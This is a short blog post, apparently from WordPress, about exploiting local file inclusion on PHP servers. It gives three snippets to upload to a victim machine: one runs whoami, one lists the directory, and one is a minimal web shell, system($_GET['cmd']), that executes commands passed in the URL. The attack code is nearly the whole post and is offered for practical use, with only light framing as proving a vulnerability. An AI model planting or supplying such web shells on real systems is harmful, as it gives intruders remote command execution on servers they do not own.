LFI php files

If you have have local file inclusion and can upload your own files here a few files to help get further or more information.

Create the file on you attack machine and upload it.

The first one will show who the php process is running as if it has the privilege to execute.

<?php
// show the user that owns the running php/httpd process
echo exec(‘whoami’);
?>

The second will show listing of the directory the php file is located in.

<?php
$output = shell_exec(‘ls -ls’);
echo “<pre>$output</pre>”;
?>

The third will allow commands to be passed in on the URL.  Like “http://victim.com/about.php?cmd=ls -al”

<?php
system($_GET[‘cmd’]);
?>

There are a ton of these out there the ones I listed are the quick and dirty ones that just help you prove the system is vulnerable and get you a bit more information.  🙂

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s